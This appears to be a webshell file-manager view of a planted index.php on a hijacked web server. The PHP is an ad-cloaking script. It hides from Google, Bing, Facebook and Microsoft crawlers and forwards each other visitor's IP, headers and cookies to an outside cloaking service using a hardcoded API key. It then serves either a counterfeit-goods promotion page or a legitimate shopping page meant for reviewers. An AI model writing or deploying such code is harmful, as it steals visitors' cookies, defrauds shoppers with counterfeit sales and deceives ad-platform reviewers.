HEX
Server: nginx/1.28.1
System: Linux 10-41-63-61 6.8.0-31-generic #31-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 20 00:40:06 UTC 2024 x86_64
User: www (1001)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/www.ivnjeb.com/brqw/
Upload Files
File: /www/wwwroot/www.ivnjeb.com/brqw/index.php
 







<?php
    
ini_set("display_errors", "Off");
error_reporting(0);

$jsonData = array();                                // 初始化接口发送数据
if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {     // 使用cloudflare 转发的IP地址
    $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
} else {
    if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
        $ip = getenv('HTTP_CLIENT_IP');
    } elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
        $ip = getenv('REMOTE_ADDR');
    } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
}
$boolean = true;
$hostname = gethostbyaddr($ip);
if (!empty($hostname)) {
    if(is_numeric(stripos($hostname, 'google')) || is_numeric(stripos($hostname, 'bing')) || is_numeric(stripos($hostname, 'facebook')) || is_numeric(stripos($hostname, 'microsoft'))) {
        $boolean = false;
    }
}

//add by new cloak
function is_https()
{
    if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) === 'on')
    {
        return TRUE;
    }
    elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https')
    {
        return TRUE;
    }
    elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && $_SERVER['HTTP_FRONT_END_HTTPS'] === 'on')
    {
        return TRUE;
    }
    return FALSE;
}

function browser_headers()
{
    $headers = array();
    foreach ($_SERVER as $name => $value) {
        if (preg_match('/^HTTP_/', $name)) {
            // convert HTTP_HEADER_NAME to header-name
            $name = strtr(substr($name, 5), '_', '-');
            $name = strtolower($name);
            $headers[$name] = $value;
        }
    }
    return $headers;
}

function encode_visitor_cookies()
{
    $transmit_string = "";

    foreach ($_COOKIE as $name => $value) {
        try {
            $transmit_string .= "$name=$value; ";
        } catch (Exception $e) {
            continue;
        }
    }

    return $transmit_string;
}

function forward_response_cookies($ch, $headerLine)
{
    if (preg_match('/^Set-Cookie:/mi', $headerLine, $cookie)) {
        header($headerLine, false);
    }

    return strlen($headerLine); // Needed by curl
}

function get_SERVER_value($field_name)
{
    return isset($_SERVER[$field_name]) ? $_SERVER[$field_name] : null;
}

//add by new cloak END

if($boolean) {
    $headers = browser_headers();
//    $visit_domain = str_replace('www.', '', $_SERVER['HTTP_HOST']);     // 当前网站域名
    $visit_domain = (is_https() ? "https://" : "http://"). $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $jsonData['id'] = '1gpWBa';
    $jsonData['ip'] = $ip;
    $jsonData['domain'] = $visit_domain;
    $jsonData['country_code'] = 'TW';  
    //设置该参数后,将替换"广告策略》访问者地理位置>过滤"的设置,填写国家代码,多个用逗号分隔,如:US,GB,CA,AU,IE,NZ
    $jsonData['referer'] = get_SERVER_value('HTTP_REFERER');
    $jsonData['headers'] = json_encode($headers);
    $ch = curl_init('www.tiktokba.com/cloak/byApi');

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
    curl_setopt($ch, CURLOPT_USERAGENT, get_SERVER_value('HTTP_USER_AGENT'));
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

    curl_setopt($ch, CURLOPT_ENCODING, ""); //Enables compression
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-type: application/json"]);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["escloak-key: xio83uvN6bUmW4Ide0ayOztc5pYjHLlk"]);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($jsonData));
    curl_setopt($ch, CURLOPT_HEADERFUNCTION, "forward_response_cookies"); //Forward response's cookies to visitor
    if ($_COOKIE) {//Forward visitor's cookie to our server
        curl_setopt($ch, CURLOPT_COOKIE, encode_visitor_cookies());
    }
    $return = curl_exec($ch);
    if($return == false){
        echo 'Curl error: ' . curl_error($ch);exit;
    }
    $return = json_decode($return, true);
    $boolean = $return['result'];           // 返回true 访问仿品,返回false 访问正品
    
    
           if($boolean == true){//推广页面
 echo '<base href="https://www.ttosn56.com/dtfx/05/" /> ';
 $f_info=implode("",file("https://www.ttosn56.com/dtfx/05/"));   
echo $f_info;   
 
       }
       elseif($boolean == false){//审核页面
 
 
   echo '<base href="https://m.momoshop.com.tw/" /> ';
   $f_info=implode("",file("https://m.momoshop.com.tw/search.momo?searchKeyword=%E9%81%8B%E5%8B%95%E5%85%A7%E8%A1%A3&couponSeq=&searchType=4&cateLevel=-1&curPage=1&cateCode=&cateName=&maxPage=73&minPage=1&_advCp=N&_advFirst=N&_advFreeze=N&_advSuperstore=N&_advTvShop=N&_advTomorrow=N&_advNAM=N&_advStock=N&_advPrefere=N&_advThreeHours=N&_advPriceS=&_advPriceE=&_brandNameList=&_brandNoList=&ent=b&_imgSH=fourCardType&specialGoodsType=&_isFuzzy=0&_spAttL=&_mAttL=&_sAttL=&_noAttL=&topMAttL=&topSAttL=&topNoAttL="));   
echo $f_info; 

   
       }
    
    
    
}
@ Telegram